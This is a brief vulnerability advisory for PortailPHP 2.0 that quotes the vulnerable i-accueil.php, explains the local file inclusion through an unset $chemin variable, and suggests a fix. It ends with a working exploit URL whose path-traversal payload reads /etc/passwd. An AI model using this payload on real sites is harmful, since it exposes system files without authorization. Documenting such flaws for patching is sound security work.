[START]

#########################################################################################
[0x01] Informations:

Script         : Portailphp 2.0
Download       : http://www.safari-msi.com/portailphp/mod_file/upload/PortailPHP-v2.0.zip
Vulnerability  : Local File Inclusion
Author         : Osirys
Contact        : osirys[at]live[dot]it
Website        : http://osirys.org
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay, str0ke. Expecially to: AlpHaNiX

#########################################################################################
[0x02] Bug:[Local File Inclusion]
######

Bugged file is: /[path]/i-accueil.php

[CODE]

<?php
/*
PORTAILPHP
 */
echo "<table width='100%'><tr><td>";
echo "<img border='0' src='themes/" . $_SESSION["App_Theme"] . "/ico-fleche01.gif' alt=''>
&nbsp;Bienvenue sur <strong>$App_Me_Titre</strong><br /><br />" ;
include("$chemin/mod_news/index.php");
echo "</td></tr></table>";

?>

[/CODE]

$chemin is not declared, so we can set its value from GET.

[!] FIX: Just declare $chemin, or don't include it, becouse it's not necessary. 
         i-accueil.php is in the / path, like /mod_news/index.php.
         Secure include: include("/mod_news/index.php");

[!] EXPLOIT: /[path]/i-accueil.php?chemin=[local_file_to_include]
                                          ../../../../../../../../../../../etc/passwd%00

#########################################################################################

[/END]